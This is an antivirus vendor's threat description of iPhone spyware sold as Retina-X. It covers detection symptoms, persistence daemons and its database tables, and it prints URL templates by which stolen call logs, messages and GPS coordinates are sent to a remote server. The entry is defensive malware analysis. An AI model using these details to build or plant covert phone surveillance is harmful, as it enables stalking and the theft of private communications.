Spy/MobileSpy!iPhoneOS

Alias/esSpyware:WinCE/BopSmiley.A, SPR/MobileSpy, SPR/RetinaX.A
Release DateAug 28, 2009
Detection Availability
Active DatabaseExtended Database
FortiGatelowhigh
FortiClient
FortiMailN/A
Current Antivirus Definition Database Version: 12.196
Description

Visible Symptoms

  • in Cydia, an application named Retina-X is installed
  • presence of the following daemons:
    • /usr/libexec/msd
    • /usr/libexec/mslocd


Figure 1. Infected mobile phone, on which Retina-X is installed

Detailed Analysis

This is the iPhone version of Spy/MobileSpy!WinCE. It allows an attacker to eavesdrop on the activity of a remote iPhone: all incoming and outgoing calls, SMS, URLs are logged on a webserver the attacker has access to. The geographic location of the victim is logged too. The attacker has a personal account on the remote webserver (https://www.{REMOVED}spylogs.com)

As for Spy/MobileSpy!WinCE, it must be noted that proper installation of the spyware requires physical access to the victim's device.

Installation of this spyware requires a jailbroken iPhone. Jailbroken applications are usually installed using an application named Cydia. This application scans third party application repositories. This spyware is found in such repositories. It is named Retina-X.



Technical Details


The spyware installs or creates the following files on the iPhone:
  • System/Library/LaunchDaemons/com.ms.msd.plist: this file ensures the msd daemon is run after reboot, and then run permanently.
  • System/Library/LaunchDaemons/com.ms.mslocd.plist: same but for the mslocd daemon.
  • User/Library/SMS/sms.db: this is a SQLite 3 database. It stores victim's messages, the spyware's version and various internal counters.
  • User/Library/CallHistory/call_history.db: same as sms.db but for call logs.
  • usr/libexec/msd: the main spyware daemon
  • usr/libexec/mdlocd: location manager daemon
  • var/mobile/.ll.dat
The logs are sent to a remote website using HTTP:
  • call logs contain the time of the call, incoming and outgoing phone number. The spyware sends the log to the remote webserver using an URL such as: 
    http://{REMOVED}/webapi/calllog.php?sID=THE-ID&date=CALL-DATE&time=CALL-TIME&from=SENDER-PHONE-NUMBER&to=RECIPIENT-PHONE-NUMBER&dir=DIRECTION&dur=DURATION
    The direction is either incoming (SMS received on the victim's phone) or outgoing (SMS sent by the victim).
  • sms logs are sent using http://{REMOVED}/webapi/sms.php
  • geographic location logs are sent with this URL: 
    http://{REMOVED}/webapi/gpslog.php?sID=LOG-ID&long=LONGITUDE&lat=LATITUDE&speed=SPEED
Logs are stored in an SQL database. There are at least 3 tables:
  • call_queue is the SQL table for logged calls. It contains the phone number of the call, date, duration and flags.
  • msg_queue is the SQL table for logged messages. It contains the phone number of the message, date, text and flags.
  • cfg is the SQL table that stores attackers accounts. There are two fields: user's identifier (usr) and password (passwd)
The spyware also features an automatic update process. It gets an XML file (at a fixed address) that contains the download URLs of various versions of the spyware.
The daemons rely on curl, sqlite 3 and TinyXML parsing libraries.
Description Last Updated Date: Sep 01, 2009
Reference: ID - 1012173